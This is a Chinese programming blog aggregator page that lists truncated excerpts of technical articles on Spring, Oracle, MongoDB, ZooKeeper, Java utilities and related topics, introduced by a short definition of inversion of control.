           控制反转(Inversion of Control,英文缩写为IoC)是一个重要的面向对象编程的法则来削减计算机程序的耦合问题,也是轻量级的Spring框架的核心。 控制反转一般分为两种类型,依赖注入(Dependency Injection,简称DI)和依赖查找(Dependency Lookup)。依赖注入应用比较广泛。  
  • 用spool+unixshell生成文本文件的方法 aijuans xshell
    例如我们把scott.dept表生成文本文件的语句写成dept.sql,内容如下:   set pages 50000;   set lines 200;   set trims on;   set heading off;   spool /oracle_backup/log/test/dept.lst;   select deptno||','||dname||','||loc
  • 1、基础--名词解析(OOA/OOD/OOP) asia007 学习基础知识
    OOA:Object-Oriented Analysis(面向对象分析方法) 是在一个系统的开发过程中进行了系统业务调查以后,按照面向对象的思想来分析问题。OOA与结构化分析有较大的区别。OOA所强调的是在系统调查资料的基础上,针对OO方法所需要的素材进行的归类分析和整理,而不是对管理业务现状和方法的分析。   OOA(面向对象的分析)模型由5个层次(主题层、对象类层、结构层、属性层和服务层)
  • 浅谈java转成json编码格式技术 百合不是茶 json编码java转成json编码
    json编码;是一个轻量级的数据存储和传输的语言       在java中需要引入json相关的包,引包方式在工程的lib下就可以了   JSON与JAVA数据的转换(JSON 即 JavaScript Object Natation,它是一种轻量级的数据交换格式,非   常适合于服务器与 JavaScript 之间的数据的交
  • web.xml之Spring配置(基于Spring+Struts+Ibatis) bijian1013 javaweb.xmlSSIspring配置
    指定Spring配置文件位置 <context-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/spring-dao-bean.xml,/WEB-INF/spring-resources.xml, /WEB-INF/
  • Installing SonarQube(Fail to download libraries from server) sunjing InstallSonar
    1.  Download and unzip the SonarQube distribution 2.  Starting the Web Server The default port is "9000" and the context path is "/". These values can be changed in &l
  • 【MongoDB学习笔记十一】Mongo副本集基本的增删查 bit1129 mongodb
    一、创建复本集   假设mongod,mongo已经配置在系统路径变量上,启动三个命令行窗口,分别执行如下命令:   mongod --port 27017 --dbpath data1 --replSet rs0 mongod --port 27018 --dbpath data2 --replSet rs0 mongod --port 27019 -
  • Anychart图表系列二之执行Flash和HTML5渲染 白糖_ Flash
    今天介绍Anychart的Flash和HTML5渲染功能   HTML5 Anychart从6.0第一个版本起,已经逐渐开始支持各种图的HTML5渲染效果了,也就是说即使你没有安装Flash插件,只要浏览器支持HTML5,也能看到Anychart的图形(不过这些是需要做一些配置的)。 这里要提醒下大家,Anychart6.0版本对HTML5的支持还不算很成熟,目前还处于
  • Laravel版本更新异常4.2.8-> 4.2.9 Declaration of ... CompilerEngine ... should be compa bozch laravel
    昨天在为了把laravel升级到最新的版本,突然之间就出现了如下错误: ErrorException thrown with message "Declaration of Illuminate\View\Engines\CompilerEngine::handleViewException() should be compatible with Illuminate\View\Eng
  • 编程之美-NIM游戏分析-石头总数为奇数时如何保证先动手者必胜 bylijinnan 编程之美
    import java.util.Arrays; import java.util.Random; public class Nim { /**编程之美 NIM游戏分析 问题: 有N块石头和两个玩家A和B,玩家A先将石头随机分成若干堆,然后按照BABA...的顺序不断轮流取石头, 能将剩下的石头一次取光的玩家获胜,每次取石头时,每个玩家只能从若干堆石头中任选一堆,
  • lunce创建索引及简单查询 chengxuyuancsdn 查询创建索引lunce
    import java.io.File; import java.io.IOException; import org.apache.lucene.analysis.Analyzer; import org.apache.lucene.analysis.standard.StandardAnalyzer; import org.apache.lucene.document.Docume
  • [IT与投资]坚持独立自主的研究核心技术 comsci it
           和别人合作开发某项产品....如果互相之间的技术水平不同,那么这种合作很难进行,一般都会成为强者控制弱者的方法和手段.....        所以弱者,在遇到技术难题的时候,最好不要一开始就去寻求强者的帮助,因为在我们这颗星球上,生物都有一种控制其
  • flashback transaction闪回事务查询 daizj oraclesql闪回事务
       闪回事务查询有别于闪回查询的特点有以下3个: (1)其正常工作不但需要利用撤销数据,还需要事先启用最小补充日志。 (2)返回的结果不是以前的“旧”数据,而是能够将当前数据修改为以前的样子的撤销SQL(Undo SQL)语句。 (3)集中地在名为flashback_transaction_query表上查询,而不是在各个表上通过“as of”或“vers
  • Java I/O之FilenameFilter类列举出指定路径下某个扩展名的文件 游其是你 FilenameFilter
    这是一个FilenameFilter类用法的例子,实现的列举出“c:\\folder“路径下所有以“.jpg”扩展名的文件。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
  • C语言学习五函数,函数的前置声明以及如何在软件开发中合理的设计函数来解决实际问题 dcj3sjt126com c
    # include <stdio.h> int f(void) //括号中的void表示该函数不能接受数据,int表示返回的类型为int类型 { return 10; //向主调函数返回10 } void g(void) //函数名前面的void表示该函数没有返回值 { //return 10; //error 与第8行行首的void相矛盾 } in
  • 今天在测试环境使用yum安装,遇到一个问题: Error: Cannot retrieve metalink for repository: epel. Pl dcj3sjt126com centos
    今天在测试环境使用yum安装,遇到一个问题: Error: Cannot retrieve metalink for repository: epel. Please verify its path and try again   处理很简单,修改文件“/etc/yum.repos.d/epel.repo”, 将baseurl的注释取消, mirrorlist注释掉。即可。 &n
  • 单例模式 shuizhaosi888 单例模式
    单例模式      懒汉式 public class RunMain { /** * 私有构造 */ private RunMain() { } /** * 内部类,用于占位,只有 */ private static class SingletonRunMain { priv
  • Spring Security(09)——Filter 234390216 Spring Security
    Filter 目录 1.1     Filter顺序 1.2     添加Filter到FilterChain 1.3     DelegatingFilterProxy 1.4     FilterChainProxy 1.5
  • 公司项目NODEJS实践0.1 逐行分析JS源代码 mongodbnginxubuntunodejs
      一、前言         前端如何独立用nodeJs实现一个简单的注册、登录功能,是不是只用nodejs+sql就可以了?其实是可以实现,但离实际应用还有距离,那要怎么做才是实际可用的。         网上有很多nod
  • java.lang.Math liuhaibo_ljf javaMathlang
    System.out.println(Math.PI); System.out.println(Math.abs(1.2)); System.out.println(Math.abs(1.2)); System.out.println(Math.abs(1)); System.out.println(Math.abs(111111111)); System.out.println(Mat
  • linux下时间同步 nonobaba ntp
    今天在linux下做hbase集群的时候,发现hmaster启动成功了,但是用hbase命令进入shell的时候报了一个错误  PleaseHoldException: Master is initializing,查看了日志,大致意思是说master和slave时间不同步,没办法,只好找一种手动同步一下,后来发现一共部署了10来台机器,手动同步偏差又比较大,所以还是从网上找现成的解决方
  • ZooKeeper3.4.6的集群部署 roadrunners zookeeper集群部署
    ZooKeeper是Apache的一个开源项目,在分布式服务中应用比较广泛。它主要用来解决分布式应用中经常遇到的一些数据管理问题,如:统一命名服务、状态同步、集群管理、配置文件管理、同步锁、队列等。这里主要讲集群中ZooKeeper的部署。   1、准备工作 我们准备3台机器做ZooKeeper集群,分别在3台机器上创建ZooKeeper需要的目录。   数据存储目录
  • Java高效读取大文件 tomcat_oracle java
      读取文件行的标准方式是在内存中读取,Guava 和Apache Commons IO都提供了如下所示快速读取文件行的方法:   Files.readLines(new File(path), Charsets.UTF_8);   FileUtils.readLines(new File(path));   这种方法带来的问题是文件的所有行都被存放在内存中,当文件足够大时很快就会导致
  • 微信支付api返回的xml转换为Map的方法 xu3508620 xmlmap微信api
    举例如下: <xml>    <return_code><![CDATA[SUCCESS]]></return_code>    <return_msg><![CDATA[OK]]></return_msg>    <appid><
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他